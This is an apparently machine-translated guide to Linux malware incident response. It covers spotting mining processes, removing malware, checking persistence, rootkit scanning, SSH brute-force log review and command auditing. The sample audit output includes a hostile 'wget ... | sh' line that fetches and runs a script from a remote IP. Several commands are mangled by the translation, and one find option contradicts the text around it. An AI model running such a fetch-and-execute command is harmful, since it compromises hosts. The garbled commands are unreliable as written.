1, Handling Linux emergency response is divided into four steps:

1. Phenomenon identification
2. Clear virus
3. Closed loop bottom
4. System reinforcement

1. Recognition phenomenon

Through the system operation status and security equipment alarm, find the abnormal phenomena of the host and confirm the suspicious behavior of the virus. Whether the system CPU is abnormal

top command, sort CPU in descending order (enter capital P, and the results will be sorted in descending order according to CPU occupation. Enter capital M, and the results will be sorted in descending order according to memory occupation.

A process with a CPU utilization of more than 70% and a suspicious name is most likely a mining virus.

Is there a suspicious process
Enumeration process command line: ps -aux

Viruses generally carry suspicious command lines. When you find strange strings such as url in the command line, you should pay attention to that it is likely to be a virus downloader.

Whether the security gateway has alarm
It is the most direct way to identify the threat from the security gateway alarm, but confirming that the host has been infected with the virus is only the first step. The next step is to locate which process is communicating with C & C.

Monitor the progress of communication with the target IP:

while true; do netstat -antp | grep [ip]; done

Sometimes the security gateway detects not all malicious IP, but also a domain name. In this case, the IP corresponding to the domain name is changed, and we can't monitor it directly with the above methods.

We can first add a rule in the host file to redirect the malicious domain name to a random IP address, and then monitor it.
In this way, we can get the malicious process communicating with it

Are there any suspicious historical commands
Traverse the host history command to find out whether there is a malicious command: History

2. Clear virus

The process information traced back from the first link will help us locate the virus process & virus file and eliminate it.

End virus process
Clear the process chain of suspicious processes:

ps -elf | grep [pid] kill -9 [pid]

Delete virus file
Locate the file path corresponding to the virus process:

ls -al /proc/[pid]/exe
rm -f [exe_path]

3. Closed loop bottom

Compared with Windows, there are fewer ways for virus persistence under Linux, mainly in the following four ways.
Check for suspicious scheduled tasks

Enumerating scheduled tasks: crontab-l

View anacron asynchronous scheduled task: cat/etc/anacrontab

Check whether there are suspicious services, enumerate all services of the host, and check whether there are malicious services:

systemctl list-unit-files

Check whether the system files are hijacked
Enumerate the files in the system folder, and view the files modified within 7 days in order of modification events:

find /usr/bin/ /usr/sbin/ /bin/ /usr/local/bin/ -type f -mtime +7 | xargs ls -la

Check for virus Daemons
Monitor daemon behavior: lsof-p[pid]

strace-tt-T -etrace=all-p$pid

Scan for malicious drivers
Enumerating / scanning system drivers: lsmod

Install chkrootkit to scan:

wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gztar zxvf chkrootkit.tar.gzcd chkrootkit-0.52make sense./chkrootkit

Install rkhunter for scanning:

Wgethttps://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz

tar -zxvf rkhunter-1.4.4.tar.gz

cd rkhunter-1.4.4

./installer.sh --install

rkhunter -c

The last link is often easy to forget. 90% of the viruses under the Linux platform are transmitted and infected through the network. Therefore, most of the reasons why your host is infected with the virus are also due to insufficient Web security protection. Check it quickly.

Modify SSH weak password

Query host login log:

grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}'

Locate the source IP with burst:

grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c

User name and password of blasting log:

grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr

SSH blasting is the most commonly used means of transmission of Linux virus. If the host with weak password is easy to be infected by other infected hosts, SSH blasting is successful, so as to infect the virus again.

Add command audit
Add login IP address, command execution time and other information for historical commands:

[1] Save 10000 commands:

sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile

[2] Add the following line number configuration information at the end of the / etc/profile file:

USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'`

if [ "$USER_IP" = "" ]

then

USER_IP=`hostname`

fi 

export HISTTIMEFORMAT="%F %T $USER_IP `whoami` "  

shopt -s histappend  

export PROMPT_COMMAND="history -a"

[3] Make the configuration effective:

source /etc/profile

Generation effect:

762019-10-2817:05:34113.110.229.230 wget -q -T180 -O-http://103.219.112.66:8000/i.sh) | sh

Patch common Web vulnerabilities
structs2 series RCE vulnerabilities

thinkphp5.XRCE vulnerability

Redis unauthorized access vulnerability

ConfluenceRCE vulnerability (CVE_2019_3396)

DrupalRCE vulnerability (CVE-2018-7600)

ThinkPHPRCE vulnerability (CVE-2019-9082)